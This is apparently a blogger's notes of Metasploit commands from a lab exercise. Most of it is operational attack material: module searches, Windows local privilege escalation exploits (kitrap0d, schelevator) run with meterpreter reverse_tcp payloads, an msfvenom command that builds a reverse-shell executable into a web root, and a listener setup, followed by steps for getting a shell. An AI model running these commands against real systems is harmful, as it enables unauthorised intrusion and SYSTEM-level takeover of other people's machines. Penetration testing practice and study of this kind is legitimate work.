msfconsole commands we used include:

search for module that affect the windows platform and has a type of post.

search type:post platform:windows

search for module that affect the windows platform and has a type of exploit and can be run via a local session.

search type:exploit platform:windows path:local

list out all the background sessions

sessions -l

restore background session by id.

sessions -i #

Use this module to enumerate possible vulnerabilities on the target host. This module needs an established session to run against and can be seen when run ‘show options’. SESSION is the id of the established session.

use post/windows/gather/enum_patches
set SESSION 1
run

Use the ‘kitrap0d’ exploit to get SYSTEM level privileges on the windows box.

info exploit/windows/local/ms10_015_kitrap0d 
use exploit/windows/local/ms10_015_kitrap0d 
set SESSION 1
use payload windows/meterpreter/reverse_tcp
set rhost 192.168.160.110
set rport 7479
exploit

Use the ‘schelevator’ exploit to run a scheduled task as a SYSTEM user and start a reverse tcp shell using those privileges.

info exploit/windows/local/ms10_092_schelevator
use exploit/windows/local/ms10_092_schelevator
set SESSION 1
use payload windows/meterpreter/reverse_tcp
set RHOST 192.168.160.110
set RPORT 7478
exploit

Generate a reverse meterpreter payload msfvenom (Kali 2). This payload can be executed from a target host and will start a reverse tcp session.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.168.110 lport=7477 -f exe -o /var/www/html/payload.exe

To allow the above session to connect you will need to start a listener from your kali instance.

use exploit/muli/handler
show options
set LHOST 192.168.168.110
set LPORT 7477
set payload windows/meterpreter/reverse_tcp
exploit

Steps to get a meterpreter shell

  1. deliver a payload
    • use an exploit to have msfconsole drop and execute the payload.
    • manually create the payload then find a way to get it on to the target and executed.
  2. listen for a the reverse tcp shell connection.
    • if you can use an exploit then this will be taken care of for you.
    • if you manually drop the payload then you can use the exploit/multi/handler module to listen for incoming connections.

resources

comments powered by Disqus